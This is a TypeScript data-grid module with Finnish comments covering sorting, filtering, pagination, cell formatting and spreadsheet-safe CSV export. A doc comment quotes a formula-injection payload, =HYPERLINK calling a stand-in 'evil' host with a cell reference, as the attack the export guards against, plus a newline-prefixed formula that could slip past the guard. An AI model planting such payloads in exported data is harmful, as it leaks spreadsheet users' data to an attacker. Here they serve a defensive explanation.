/**
 * Data-gridin puhdas datalogiikka (AB-WP6.13): sarakkeiden ja rivien jäsennys,
 * suodatus, lajittelu, sivutusleikkaus, soluformatointi ja CSV-vienti. Ei DOMia —
 * nämä testataan suoraan; runtime.ts:n wireDataGrid orkestroi DOM- ja slot-työn.
 *
 * fasthub2-poikkeamat (dokumentoitu): yksi suodatinarvo per sarake (teksti =
 * sisältää, numero = ≥-kynnys); ei mukautettuja format-stringejä (tyyppipohjainen
 * muotoilu); vienti vain CSV; ei shift-klik-aluevalintaa.
 */
import type { MessageLocale } from './messages';
import { resolveMessage } from './messages';
import { formatCurrency, formatDecimal, numberStyle } from './numberFormat';

import { resolvePath } from './dataSources';

export interface GridColumn {
  key: string;
  label: string;
  type: string; // text | number | boolean | date | currency | enum
  sortable: boolean;
  filterable: boolean;
  hidden: boolean;
  align?: string; // left | right | center
  width?: string;
}

export type SortDir = 'asc' | 'desc' | '';

/** Jäsennä data-arvo riveiksi: taulukko sellaisenaan tai JSON-string. */
export function coerceRows(value: unknown): Record<string, unknown>[] {
  if (Array.isArray(value)) return value as Record<string, unknown>[];
  if (typeof value === 'string') {
    try {
      const p = JSON.parse(value);
      if (Array.isArray(p)) return p as Record<string, unknown>[];
    } catch {
      /* rikkinäinen JSON → tyhjä */
    }
  }
  return [];
}

/** Jäsennä sarakemäärittelyt; vaatii string-key:n, muut kentät oletuksin. */
export function parseColumns(json: string): GridColumn[] {
  let arr: unknown;
  try {
    arr = JSON.parse(json);
  } catch {
    return [];
  }
  if (!Array.isArray(arr)) return [];
  const cols: GridColumn[] = [];
  for (const c of arr) {
    if (!c || typeof c !== 'object') continue;
    const o = c as Record<string, unknown>;
    if (typeof o.key !== 'string') continue;
    cols.push({
      key: o.key,
      label: typeof o.label === 'string' ? o.label : o.key,
      type: typeof o.type === 'string' ? o.type : 'text',
      sortable: o.sortable !== false,
      filterable: o.filterable !== false,
      hidden: o.hidden === true,
      align: typeof o.align === 'string' ? o.align : undefined,
      width: typeof o.width === 'string' ? o.width
        : typeof o.width === 'number' ? `${o.width}px` : undefined,
    });
  }
  return cols;
}

function compareValues(a: unknown, b: unknown, type: string): number {
  if (a == null && b == null) return 0;
  if (a == null) return -1;
  if (b == null) return 1;
  if (type === 'number' || type === 'currency') {
    const na = Number(a);
    const nb = Number(b);
    if (!Number.isNaN(na) && !Number.isNaN(nb)) return na - nb;
  } else if (type === 'boolean') {
    return (a ? 1 : 0) - (b ? 1 : 0);
  } else if (type === 'date') {
    const da = Date.parse(String(a));
    const db = Date.parse(String(b));
    if (!Number.isNaN(da) && !Number.isNaN(db)) return da - db;
  }
  return String(a).localeCompare(String(b));
}

/** Lajittele rivit vakaasti (uusi taulukko); tyhjä avain/suunta → alkuperäinen. */
export function sortRows(
  rows: Record<string, unknown>[], columns: GridColumn[], sortKey: string, dir: SortDir,
): Record<string, unknown>[] {
  if (!sortKey || (dir !== 'asc' && dir !== 'desc')) return rows;
  const type = columns.find((c) => c.key === sortKey)?.type || 'text';
  const sign = dir === 'desc' ? -1 : 1;
  return [...rows].sort((r1, r2) => sign * compareValues(resolvePath(r1, sortKey), resolvePath(r2, sortKey), type));
}

/** Täsmääkö rivi yhden sarakkeen suodatinarvoon (teksti sisältää; numero ≥). */
export function matchesFilter(row: Record<string, unknown>, key: string, filterValue: unknown, type: string): boolean {
  if (filterValue == null || filterValue === '') return true;
  const cell = resolvePath(row, key);
  const fv = String(filterValue).toLowerCase();
  if (type === 'number' || type === 'currency') {
    const threshold = Number(filterValue);
    if (!Number.isNaN(threshold)) {
      const n = Number(cell);
      return !Number.isNaN(n) && n >= threshold;
    }
  }
  if (type === 'boolean') {
    return String(cell).toLowerCase() === fv;
  }
  return String(cell ?? '').toLowerCase().includes(fv);
}

/** Suodata rivit aktiivisten per-sarake-suodattimien mukaan (AND). */
export function filterRows(
  rows: Record<string, unknown>[], filters: Record<string, unknown>, columns: GridColumn[],
): Record<string, unknown>[] {
  const active = Object.entries(filters).filter(([, v]) => v != null && v !== '');
  if (active.length === 0) return rows;
  return rows.filter((row) =>
    active.every(([key, v]) => matchesFilter(row, key, v, columns.find((c) => c.key === key)?.type || 'text')));
}

/** Leikkaa sivutus (offset + pageSize); pageSize ≤ 0 → ei leikkausta. */
export function applyPagination(
  rows: Record<string, unknown>[], offset: number, pageSize: number,
): Record<string, unknown>[] {
  if (!pageSize || pageSize <= 0) return rows;
  const start = Math.max(0, offset || 0);
  return rows.slice(start, start + pageSize);
}

/**
 * Muotoile soluarvo NÄYTETTÄVÄKSI (tyyppipohjainen, deterministinen).
 *
 * <p>`locale` ohjaa ryhmittimen, desimaalierottimen, valuuttasymbolin paikan ja
 * totuusarvon sanat (WP-KL3, löydös `E-3`). Oletus `'en'` säilyttää entisen
 * käytöksen, joten kutsuja joka ei välitä kieltä saa saman kuin ennen.
 */
export function formatCellValue(
  value: unknown, type: string, locale: MessageLocale = 'en',
): string {
  if (value == null) return '';
  if (type === 'boolean') return resolveMessage(value ? 'booleanTrue' : 'booleanFalse');
  if (type === 'number' || type === 'currency') {
    const n = Number(value);
    if (!Number.isNaN(n) && typeof value !== 'object') {
      const style = numberStyle(locale);
      return type === 'currency'
        ? formatCurrency(n, style)
        : formatDecimal(n, style, null);
    }
  }
  if (typeof value === 'object') return JSON.stringify(value);
  return String(value);
}

/**
 * Sama arvo KONELUETTAVANA (`D2` = A): CSV:n lukija on taulukkolaskenta, ei
 * ihminen. `1 234,56 €` tekisi sarakkeesta tekstin ja rikkoisi tuonnin lokaalista
 * riippuen, joten vienti pitää pisteen desimaalierottimena, jättää ryhmittimen
 * pois eikä kirjoita valuuttasymbolia. Totuusarvo menee samana molempiin, koska
 * `Yes`/`No` on CSV:ssä yhtä luettava kuin ruudulla.
 */
export function formatCellValueForExport(value: unknown, type: string): string {
  if (value == null) return '';
  if (type === 'boolean') return resolveMessage(value ? 'booleanTrue' : 'booleanFalse');
  if (type === 'number' || type === 'currency') {
    const n = Number(value);
    if (!Number.isNaN(n) && typeof value !== 'object') return String(n);
  }
  if (typeof value === 'object') return JSON.stringify(value);
  return String(value);
}

/** Klik sarakkeeseen → seuraava lajittelutila (asc → desc → ei lajittelua). */
export function cycleSort(currentKey: string, currentDir: SortDir, clickedKey: string): { key: string; dir: SortDir } {
  if (currentKey !== clickedKey) return { key: clickedKey, dir: 'asc' };
  if (currentDir === 'asc') return { key: clickedKey, dir: 'desc' };
  if (currentDir === 'desc') return { key: '', dir: '' };
  return { key: clickedKey, dir: 'asc' };
}

/**
 * Neutraloi kaavainjektio: taulukkolaskenta SUORITTAA solun joka alkaa
 * `=`/`+`/`-`/`@` (tai TAB/CR) kaavana, joten viedyssä datassa oleva
 * `=HYPERLINK("http://evil/"&A1,"x")` vuotaa rivin sisällön avaajan klikillä.
 * Heittomerkki edessä on vakiintunut torjunta: solu näkyy tekstinä.
 *
 * <p><b>Luvut jätetään rauhaan.</b> `formatCellValueForExport` kirjoittaa
 * number/currency-sarakkeet `String(n)`:llä, joten negatiivinen luku alkaa
 * `-`-merkillä — ilman tätä rajausta `-5` muuttuisi muotoon `'-5` ja rikkoisi
 * jokaisen numeerisen viennin. Rajaus on tarkoituksellinen: ÄLÄ yksinkertaista
 * sitä pois. Pelkkä `-`-alkuinen TEKSTI neutraloidaan edelleen.
 */
function neutralizeFormula(s: string): string {
  if (/^-?\d/.test(s)) return s;
  return /^[=+\-@\t\r]/.test(s) ? `'${s}` : s;
}

/**
 * Rivien CSV (näkyvät sarakkeet); RFC-4180-escapointi, CRLF-rivinvaihdot.
 *
 * <p><b>Solun SISÄINEN rivinvaihto LITISTETÄÄN välilyönniksi.</b> Yksi viety rivi
 * on siis aina tasan yksi fyysinen rivi tiedostossa.
 *
 * <p>Pelkkä LF:n normalisointi CRLF:ksi EI riitä, vaikka se tekeekin tiedostosta
 * muodollisesti RFC-4180-kelvollisen: rivinvaihdot jäävät silti tiedostoon, ja
 * lukija joka pilkkoo rivit millä tahansa rivinvaihdolla — Excelin
 * kaksoisklikkaus-tuonti ja moni kevyt CSV-lukija — katkaisee solun kesken.
 * Yhdestä yhteydenotosta tulee useita haamurivejä ja sarakkeet siirtyvät.
 * (Mitattu: kolmirivinen viesti = 4 fyysistä riviä normalisoituna, 1 litistettynä.
 * Tiukka jäsennin luki normalisoidunkin oikein, minkä takia vika ei näkynyt
 * testeissä — siksi testi laskee FYYSISET rivit, ei jäsennettyjä.)
 *
 * <p>Kolster-yhteydenottolomakkeen vapaa `message` on tämän kentän arkkityyppi:
 * käyttäjä kirjoittaa kappaleita, ja vienti hajosi käytännössä aina.
 *
 * <p><b>JÄRJESTYS ON TURVAKRIITTINEN: litistys -> neutralointi -> escape.</b>
 * `neutralizeFormula` katsoo vain ENSIMMÄISTÄ merkkiä. Jos litistys tehtäisiin
 * vasta neutraloinnin jälkeen, arvo `"\n=SUM(A1)"` menisi vartijan ohi (alkaa
 * rivinvaihdolla, ei kaavamerkillä) ja litistys paljastaisi elävän `=`-kaavan
 * taulukkolaskentaan. Litistys ensin tarkoittaa että vartija näkee todellisen
 * ensimmäisen merkin. Tälle on oma regressiotesti; älä "siisti" järjestystä.
 */
export function toCsv(rows: Record<string, unknown>[], columns: GridColumn[]): string {
  // Rivinvaihto -> välilyönti. Peräkkäiset rivinvaihdot ja niiden ympärillä oleva
  // tyhjä tila kutistuvat YHDEKSI välilyönniksi, jottei kappalejako jätä tuplaa.
  // Yksinäinen CR (vanha Mac-tyyli) käsitellään erikseen samalla tavalla.
  // Myös SARKAIN litistetään: se on nyt sarake-erotin, ja arvon sisällä oleva
  // sarkain siirtäisi sarakkeet. Lainausmerkit eivät auta — Excelin
  // sarkainjäsennin ei kunnioita RFC-4180-lainauksia, joten "x<TAB>y" hajoaisi
  // silti kahdeksi soluksi. (Oma testi paljasti tämän: 3 kenttää 2:n sijaan.)
  const flattenNewlines = (s: string): string =>
    s.replace(/\s*\r?\n\s*/g, ' ').replace(/[\r\t]/g, ' ').trim();
  // SARKAIN-EROTIN, ei pilkku. Excel jakaa sarakkeet käyttöjärjestelmän
  // listaerottimella (suomalaisessa Windowsissa `;`), joten pilkkueroteltu
  // tiedosto valuu kaksoisklikkauksella kokonaan A-sarakkeeseen — ja silloin
  // vapaan tekstin pilkut ja lainausmerkit näkyvät raakana, mikä näyttää siltä
  // kuin escapointi olisi rikki. Sarkainta Excel kunnioittaa lokaalista
  // riippumatta, eikä `sep=`-riviä siksi tarvita (ks. UTF-16-perustelu
  // TAB_SEPARATED-vakion kommentissa).
  //
  // Sivuhyöty: pilkku EIKÄ puolipiste tarvitse enää lainausmerkkejä, joten
  // vapaa teksti pysyy luettavana myös raakana tiedostona.
  const esc = (s: string): string => (/["\t\r\n]/.test(s) ? `"${s.replace(/"/g, '""')}"` : s);
  // Neutralointi ENNEN lainausmerkkejä, jotta lisätty heittomerkki jää niiden
  // sisään. Sarakeotsikko käsitellään samoin: sekin tulee Appin tekijältä.
  const cell = (s: string): string => esc(neutralizeFormula(flattenNewlines(s)));
  const header = columns.map((c) => cell(c.label)).join('\t');
  const lines = rows.map((row) =>
    columns.map((c) => cell(formatCellValueForExport(resolvePath(row, c.key), c.type))).join('\t'));
  return [header, ...lines].join('\r\n');
}
